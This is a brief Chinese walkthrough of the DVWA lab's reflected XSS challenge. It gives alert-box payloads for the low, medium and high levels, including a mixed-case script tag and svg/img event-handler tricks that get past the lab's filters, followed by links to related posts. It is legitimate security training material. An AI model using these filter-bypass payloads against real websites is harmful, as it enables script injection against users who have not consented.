【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦

假客套2024-11-06 13:19

一、低级low

简单拿捏

<script>alert(123)</script>

二、中级middle

源码过滤了script但是没有过滤大小写,改成大写S

<Script>alert(123)</script>

三、高级high

比中级高,过滤了script并且以及大小写,使用其他标签,二选一就行

<svg onload=alert(123)>

<img src=x onerror=alert(123)>
相关推荐
轨迹H12 小时前
kali设置中文输入法
linux·网络安全·渗透测试·kali
cr.sheeper12 小时前
Vulnhub靶场Apache解析漏洞
网络安全·apache
Autumn.h12 小时前
文件解析漏洞
web安全·网络安全·中间件
Mitch31114 小时前
【漏洞复现】CVE-2023-37461 Arbitrary File Writing
web安全·网络安全·prometheus·metersphere·漏洞复现
CVE-柠檬i14 小时前
渗透测试-前后端加密分析之RSA+AES
网络安全
TazmiDev19 小时前
[极客大挑战 2019]BabySQL 1
服务器·数据库·安全·web安全·网络安全·密码学·安全威胁分析
亚信安全官方账号1 天前
亚信安全与方天股份达成战略合作,双向奔赴助力数字化转型
网络安全
Koi慢热1 天前
黑客术语3
网络·安全·网络安全·智能路由器·空间安全·网络空间测绘安全
CVE-柠檬i1 天前
渗透测试-前端加密分析之RSA响应加密
网络安全
热门推荐
01SQL 主从数据库实时备份02YOLOv8训练好模型后,追加轮数继续训练、或者提前终止训练,缩减训练轮数03玄机平台应急响应—webshell查杀04基于大语言模型(LLM)的合成数据生成、策展和评估的综述05HCIA-datacom数通题库和录播视频资料06Docker 夺命连环 15 问07VSCode插件 —— Cody AI (免费AI助手!)08校验 GPT-4 真实性的三个经典问题:快速区分 GPT-3.5 与 GPT-4,并提供免费测试网站09(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明10ARM学习(31)编译器对overlay方式的支持